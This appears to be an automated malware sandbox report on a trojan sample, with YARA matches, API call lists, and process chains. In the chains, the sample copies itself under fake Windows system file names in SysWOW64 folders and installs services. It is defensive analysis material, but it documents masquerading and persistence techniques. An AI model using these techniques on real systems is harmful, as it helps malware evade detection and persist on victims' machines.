                      Source: Yara matchFile source: 37.2.catsrvut.exe.2ae052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.jscript9.exe.298279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.31b279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.2c7052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.2970000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.jscript9.exe.298052e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.131279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.31b279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.2181f3f.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.21d0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.135052e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.2e3279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.218053f.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.2e3279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.185279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.28b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.2b6052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.21e0000.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.135279e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.131279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.25b052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 27.2.COLORCNV.exe.135279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 34.2.wmvdspa.exe.31b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.2c7279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 26.2.execmodelproxy.exe.2c7279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.2e3052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.5b1f3f.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.KBDHEB.exe.2b6279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.2eb052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.25b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.20c4000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.5b053f.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.2ae052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.jscript9.exe.298052e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.2eb052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 36.2.msvcr100_clr0400.exe.25b279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.jscript9.exe.298279e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 28.2.usp10.exe.2e3052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.2181f3f.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.21c4000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.20c4000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 37.2.catsrvut.exe.2ae279e.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 31.2.MCCSEngineShared.exe.28b052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 30.2.msrd2x40.exe.131052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 22.2.tokenbinding2.exe.2eb279e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.185052e.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.MV9tCJw8Xr.exe.21c4000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.KBDHEB.exe.5b1f3f.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 29.2.KBDINTAM.exe.185052e.3.raw.unpack, type: UNPACKEDPE
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A45800 Sleep,GetModuleFileNameW,PathFindFileNameW,PathFindExtensionW,OpenSCManagerW,OpenServiceW,DeleteService,CloseHandle,RegCreateKeyExW,RegDeleteValueW,CloseHandle,MoveFileW,ExitProcess,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile created: C:\Windows\SysWOW64\DefaultPrinterProvider\Jump to behavior
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile deleted: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe:Zone.IdentifierJump to behavior
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00421064
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041D27C
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004133A4
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0042045E
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0040B63B
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00413778
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004159DC
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004209A0
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00411A80
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00419B00
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00413B84
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00412ED1
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041FF1C
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00421FE1
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00418FF3
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00413FA4
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E2AE3
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_021E2C56
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_02183E22
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_02183F95
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00421064
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0041D27C
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_004133A4
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0042045E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0040B63B
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00413778
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_004159DC
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_004209A0
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00411A80
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00419B00
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00413B84
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00412ED1
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0041FF1C
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00421FE1
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00418FF3
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00413FA4
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D2AE3
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D2C56
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A569A5
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A571D9
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A4922F
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A49A5B
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A464B7
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A494D9
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A48EBD
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A48E10
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A497A0
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00408180
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00401C70
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00407590
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB380E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB912E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_02EB9D1E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00408180
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00401C70
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00407590
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B6380E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B6912E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_02B69D1E
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00408180
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00401C70
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_00407590
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C7380E
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C79D1E
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: 26_2_02C7912E
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00408180
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00401C70
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_00407590
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_0135912E
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_01359D1E
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: 27_2_0135380E
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: String function: 00A47960 appears 50 times
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: String function: 00412022 appears 77 times
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: String function: 00414554 appears 51 times
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: String function: 00412022 appears 77 times
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: String function: 00414554 appears 51 times
                      Source: MV9tCJw8Xr.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tokenbinding2.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tokenbinding2.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tokenbinding2.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: tokenbinding2.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                      Source: MV9tCJw8Xr.exe, 00000001.00000000.226109151.0000000000434000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameMinnesota's county attorneys want to give the state attorney general the authority vs MV9tCJw8Xr.exe
                      Source: MV9tCJw8Xr.exe, 00000001.00000002.244368599.0000000002A50000.00000002.00000001.sdmpBinary or memory string: originalfilename vs MV9tCJw8Xr.exe
                      Source: MV9tCJw8Xr.exe, 00000001.00000002.244368599.0000000002A50000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamepropsys.dll.mui@ vs MV9tCJw8Xr.exe
                      Source: MV9tCJw8Xr.exe, 00000001.00000002.244216934.0000000002950000.00000002.00000001.sdmpBinary or memory string: System.OriginalFileName vs MV9tCJw8Xr.exe
                      Source: MV9tCJw8Xr.exeBinary or memory string: OriginalFilenameMinnesota's county attorneys want to give the state attorney general the authority vs MV9tCJw8Xr.exe
                      Source: C:\Windows\System32\svchost.exeSection loaded: xboxlivetitleid.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cdpsgshims.dll
                      Source: MV9tCJw8Xr.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
                      Source: classification engineClassification label: mal100.troj.evad.winEXE@42/7@0/100
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeCode function: OpenSCManagerW,_snwprintf,CreateServiceW,CloseServiceHandle,CloseServiceHandle,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_021D3657 CreateToolhelp32Snapshot,Process32NextW,Process32FirstW,FindCloseChangeNotification,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00403548 __EH_prolog3,LoadLibraryExA,LoadLibraryExA,LoadLibraryExA,SizeofResource,GetCurrentProcess,VirtualAllocExNuma,
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 23_2_00405060 QueryServiceConfig2W,CloseServiceHandle,ChangeServiceConfig2W,EnumServicesStatusExW,GetTickCount,OpenServiceW,GetProcessHeap,RtlAllocateHeap,RtlAllocateHeap,GetProcessHeap,HeapFree,RtlFreeHeap,
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1880:120:WilError_01
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeFile created: C:\Users\user~1\AppData\Local\Temp\UPDA7CE.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCommand line argument: LoaderLoader
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCommand line argument: LOADERLOADER
                      Source: MV9tCJw8Xr.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: MV9tCJw8Xr.exeVirustotal: Detection: 66%
                      Source: MV9tCJw8Xr.exeMetadefender: Detection: 56%
                      Source: MV9tCJw8Xr.exeReversingLabs: Detection: 77%
                      Source: unknownProcess created: C:\Users\user\Desktop\MV9tCJw8Xr.exe 'C:\Users\user\Desktop\MV9tCJw8Xr.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA=
                      Source: unknownProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: unknownProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\glu32\usp10.exe C:\Windows\SysWOW64\glu32\usp10.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\ftp\wmvdspa.exe C:\Windows\SysWOW64\ftp\wmvdspa.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
                      Source: unknownProcess created: C:\Windows\SysWOW64\d3dramp\mprdim.exe C:\Windows\SysWOW64\d3dramp\mprdim.exe
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exe 'C:\Windows\SysWOW64\DefaultPrinterProvider\\tokenbinding2.exe' YAQAADwAAABEAGUAZgBhAHUAbAB0AFAAcgBpAG4AdABlAHIAUAByAG8AdgBpAGQAZQByAFwASwBCAEQASABFAEIAAAA=
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeProcess created: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exe
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeProcess created: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exe
                      Source: C:\Windows\SysWOW64\DscCoreConfProv\execmodelproxy.exeProcess created: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exe
                      Source: C:\Windows\SysWOW64\Windows.Graphics.Printing.Workflow.Native\COLORCNV.exeProcess created: C:\Windows\SysWOW64\glu32\usp10.exe C:\Windows\SysWOW64\glu32\usp10.exe
                      Source: C:\Windows\SysWOW64\glu32\usp10.exeProcess created: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
                      Source: C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exeProcess created: C:\Windows\SysWOW64\ndfapi\msrd2x40.exe C:\Windows\SysWOW64\ndfapi\msrd2x40.exe
                      Source: C:\Windows\SysWOW64\ndfapi\msrd2x40.exeProcess created: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exe
                      Source: C:\Windows\SysWOW64\kbd101a\MCCSEngineShared.exeProcess created: C:\Windows\SysWOW64\Chakrathunk\jscript9.exe C:\Windows\SysWOW64\Chakrathunk\jscript9.exe
                      Source: C:\Windows\SysWOW64\Chakrathunk\jscript9.exeProcess created: C:\Windows\SysWOW64\ftp\wmvdspa.exe C:\Windows\SysWOW64\ftp\wmvdspa.exe
                      Source: C:\Windows\SysWOW64\ftp\wmvdspa.exeProcess created: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exe
                      Source: C:\Windows\SysWOW64\FXSXP32\msvcr100_clr0400.exeProcess created: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exe
                      Source: C:\Windows\SysWOW64\dhcpcmonitor\catsrvut.exeProcess created: C:\Windows\SysWOW64\d3dramp\mprdim.exe C:\Windows\SysWOW64\d3dramp\mprdim.exe
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041CCF2 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_004120C1 push ecx; ret
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_00414599 push ecx; ret
                      Source: C:\Users\user\Desktop\MV9tCJw8Xr.exeCode function: 1_2_0041080D push 59FFFF3Ah; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_004120C1 push ecx; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_00414599 push ecx; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\KBDHEB.exeCode function: 2_2_0041080D push 59FFFF3Ah; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A479A6 push ecx; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00A47245 push ecx; ret
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405D70 push ecx; mov dword ptr [esp], 00008067h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405D00 push ecx; mov dword ptr [esp], 000021B4h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405D30 push ecx; mov dword ptr [esp], 00002C7Ch
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405DE0 push ecx; mov dword ptr [esp], 000025AAh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405DA0 push ecx; mov dword ptr [esp], 000036B8h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405E40 push ecx; mov dword ptr [esp], 0000AEA2h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405E70 push ecx; mov dword ptr [esp], 00008D73h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405EA0 push ecx; mov dword ptr [esp], 00007473h
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405F70 push ecx; mov dword ptr [esp], 000084ADh
                      Source: C:\Windows\SysWOW64\DefaultPrinterProvider\tokenbinding2.exeCode function: 22_2_00405F20 push ecx; mov dword ptr [esp], 0000E2ADh
